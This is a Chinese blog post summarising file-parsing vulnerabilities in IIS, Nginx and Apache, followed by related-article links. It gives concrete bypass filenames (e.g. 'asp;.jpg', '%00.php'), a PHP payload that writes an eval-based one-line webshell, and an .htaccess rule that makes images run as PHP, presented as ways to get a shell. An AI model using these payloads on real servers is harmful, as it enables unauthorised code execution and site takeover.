文件解析漏洞总结

最新推荐文章于 2024-06-13 19:39:02 发布
最新推荐文章于 2024-06-13 19:39:02 发布
阅读量2.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34974749/article/details/79456128
版权

一、IIS?5.x/6.0解析漏洞

 

IIS?6.0解析利用方法有两种

1.目录解析

/xx.asp/xx.jpg

2.文件解析

pamela.asp;.jpg

第一种,在网站下建立文件夹的名字为?.asp、.asa?的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

例如创建目录?pamela.asp,那么

/pamela.asp/1.jpg

将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。

第二种,在IIS6.0下,分号后面的不被解析,也就是说

pamela.asp;.jpg

会被服务器看成是pamela.asp

还有IIS6.0?默认的可执行文件除了asp还包含这三种

/pamela.asa/pamela.cer/pamela.cdx

 

二、IIS?7.0/IIS?7.5/?Nginx?<8.03畸形解析漏洞

 

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为pamela.jpg,内容为

<?PHP fputs(fopen('shell.php','w'),'<?php?eval($_POST[cmd])?>');?>

的文件,然后访问pamela.jpg/.php,在这个目录下就会生成一句话木马shell.php

三、Nginx?<8.03?空字节代码执行漏洞

 

影响版:0.5.,0.6.,?0.7?<=?0.7.65,?0.8?<=?0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

 

四、Apache解析漏洞

 

Apache?是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如pamela.php.owf.rar?“.owf”和”.rar”?这两种后缀是apache不可识别解析,apache就会把pamela.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个pamela.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

 

五、其他

 

在windows环境下,xx.jpg[空格]?或xx.jpg.?这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。

如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

<FilesMatch?"pamela.jpg">?SetHandler?application/x-httpd-php?</FilesMatch>

然后再上传shell.jpg的木马,?这样shell.jpg就可解析为php文件。

oxff644
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
finecms-含有前台文件上传漏洞源码包.zip
01-04
一旦文件成功上传并被服务器解析执行,攻击者就可以实现远程代码执行,进一步控制网站或服务器。 4. **源码分析** 在FineCMS的源码中,涉及文件上传的部分可能没有正确地过滤非法文件类型,或者在验证文件扩展名时...
文件解析的常见两种方式
qq_49194786的博客
10-12 2555
文件解析的两种常见方式
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 8979
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
文件解析漏洞
最新发布
wbplife的博客
06-13 524
该版本默认将*.asp;.jpg 此种格式的文件名,当成Asp解析。服务器默认不解析;号及其后面的内容,相当于截断。iis除了会将asp解析成脚本执行文件之外,还会将 cer cdx asa 扩展名解析成asp;通过文件上传,或者创建文件,格式为*.asp;.jpg在IIS7.0和IIS7.5版本下也存在解析漏洞,在Fast-CGl运行模式下,在一个文件路径 /xx.jpg 后面加上/.php会将 /xx.jpg/.php 解析为php文件。利用条件。
IIS解析漏洞
weixin_51151498的博客
10-11 988
IIS解析漏洞
XML解析
m0_73192864的博客
06-19 2652
将XML文档转换为计算机程序可读取的格式的过程。XML文档中的元素、属性、实体等都需要被解析成程序能够理解的形式,以便程序能够对其进行处理和操作。1.2 解析方式(四种)1.2.1 DOM解析:DOM(文档对象模型)解析器将整个XML文档读入内存,并创建一个文档树,程序可以遍历该文档树并操作其中的节点。DOM解析器适用于文档相对较小的情况。
中间件安全IIS----文件解析漏洞利用
ZL_1618的博客
03-20 1420
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。接下来,为服务器开启ASP解析功能,这是所有ASP网站都必须启用的。
专题资料(2021-2022年)AndroidNative层文件解析漏洞挖掘指南讲解.doc
07-19
Android Native 层文件解析漏洞挖掘指南 Android Native 层文件解析漏洞挖掘是一种常见的安全漏洞,特别是在 Android 平台上。该漏洞可以导致应用程序崩溃,导致用户数据泄露和恶意攻击。为挖掘这种漏洞,我们需要...
iis畸形文件漏洞1
08-08
通过对网页源代码的分析,攻击者发现可以修改上传字段的名称和值,利用IIS的文件解析漏洞,尝试上传ASP(Active Server Pages)文件,这是一种支持脚本语言的服务器端文件类型,通常用来创建动态网页。 在这种情况...
任意文件下载知识点总结.zip
05-08
1. **路径遍历**:攻击者能够构造URL,使服务器解析文件系统的绝对路径,从而访问任意文件。 2. **权限不足**:服务器没有正确限制对敏感目录的访问,使得非授权用户可以查看或下载敏感文件。 3. **输入验证不严**...
解析cap文件
09-03
总结起来,cap文件解析涉及网络监控、故障排查、安全分析等多个领域,是IT运维和网络安全工作中不可或缺的工具。通过Wireshark、Tcpdump等工具,以及像Cap4j这样的库,我们可以深入理解网络通信的细节,提升网络管理...
文件解析的方法与原理
Victor_Li_的博客
10-10 357
然后解析并读取文件头信息,依次获得魔数、图片的数量,每张图片的高度和宽度。calcsize()方法 : 该方法用于计算格式字符串所对应的结果长度,如:struct.calcsize("ii"),返回8。开始读取前,生成和图片数量相同的数组,每个数组的形状大小等于图片的像素大小,以便接下来存储图片。解析标签文件的代码逻辑和解析图片文件的逻辑一致。解析函数通过参数接收到测试集图片文件的路径后,以二进制格式rb打开文件,并读取文件数据。解析成功后,会在指定的文件夹下生成相应的文件夹,其中存放了解析后的图片。
文件操作解析
2203_75375249的博客
04-06 188
磁盘上的文件文件。但是在程序设计中,我们一般谈的文件有两种:程序文件、数据文件(从文件功能的角度来分类的)。2.1程序文件包括源程序文件(后缀为.c目标文件(windows环境后缀为.obj可执行程序(windows环境后缀为.exe2.2数据文件文件的内容不一定是程序,而是程序运行时读写的数据,比如程序运行需要从中读取数据的文件,或者输出内容的文件文件指针缓冲文件系统中,关键的概念是文件类型指针,简称文件指针。
文件操作安全之-文件解析原理篇
村中少年的专栏
10-26 1714
文件解析的定义,文件解析漏洞原理,文件解析漏洞的具体案例,例如Apache http服务器CVE-2017-15715和NginxCVE-2013-4547文件解析漏洞,以及文件解析漏洞潜在的危害阐述文件解析漏洞中的安全问题。
56.网络安全渗透测试—[文件上传篇6]—[IIS6.0文件名解释漏洞-突破上传]
qwsn
08-07 2014
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、IIS6.0 解释漏洞 1、IIS6.0 解析漏洞分两种:目录/文件解析漏洞 2、IIS6.0文件解析漏洞的利用场景
文件上传与文件解析
Shanfenglan's blog
04-06 2657
文章目录1. IIS解析漏洞2. Apache解析漏洞参考文章 1. IIS解析漏洞 IIS6.0在解析文件时有以下两个漏洞(微软不认为这是一个漏洞,所以并没有IIS6.0的补丁) 当建立*.asa、.asp格式的文件夹时,其目录下的任何文件都将被当做asp脚本执行 当文件为.asp;1.jpg,IIS6.0同样会以ASP脚本来执 2. Apache解析漏洞 在Apache 1.x和Apache 2.x中存在解析漏洞 ,Apache在解析文件时有一个原则:当碰到不认识的扩展名时,将会从后向前解析,直到碰到认
C语言进阶篇 第六讲【文件操作】
Kukeoo的博客
02-06 641
一、本章重点 什么是文件 文件文件类型 文件缓冲区 文件指针 文件的打开和关闭 文件的顺序读写 文件的随机读写 文件结束的判定 二、什么是文件 三、文件名 四、文件类型 五、文件缓冲区 六、文件指针 七、文件的打开和关闭 八、文件的顺序读写 九、文件的随机读写 十、文件结束的判定 ...
IIS漏洞-解析漏洞
swordheart的博客
11-30 7140
漏洞介绍 解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本文件等当做可执行的脚本文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。 IIS 5.x/6.0解析漏洞 目录解析:在网站下建立文件夹的名称中带有.asp、.asa等可执行脚本文件后缀为后缀的文件夹,其目录内的任何扩展名的文件都被IIS当作可执行文件解析并执行。http://www.xxx.com/xx.asp/xx.jpg IIS 6.0环境下正常访问图片 通过访问1.asp/one.j..
解析漏洞文件上传漏洞学习--2023/03/16-18
m0_53689197的博客
03-18 486
护网学习--2023/03/16-18
PHP文件包含漏洞深度解析
"文件包含知识点总结.pdf" 在网络安全领域,文件包含漏洞是一种常见且危害极大的问题。文件包含漏洞主要源于程序设计中的动态文件加载机制,它允许攻击者通过控制某些输入参数,来改变程序包含的文件路径,从而可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值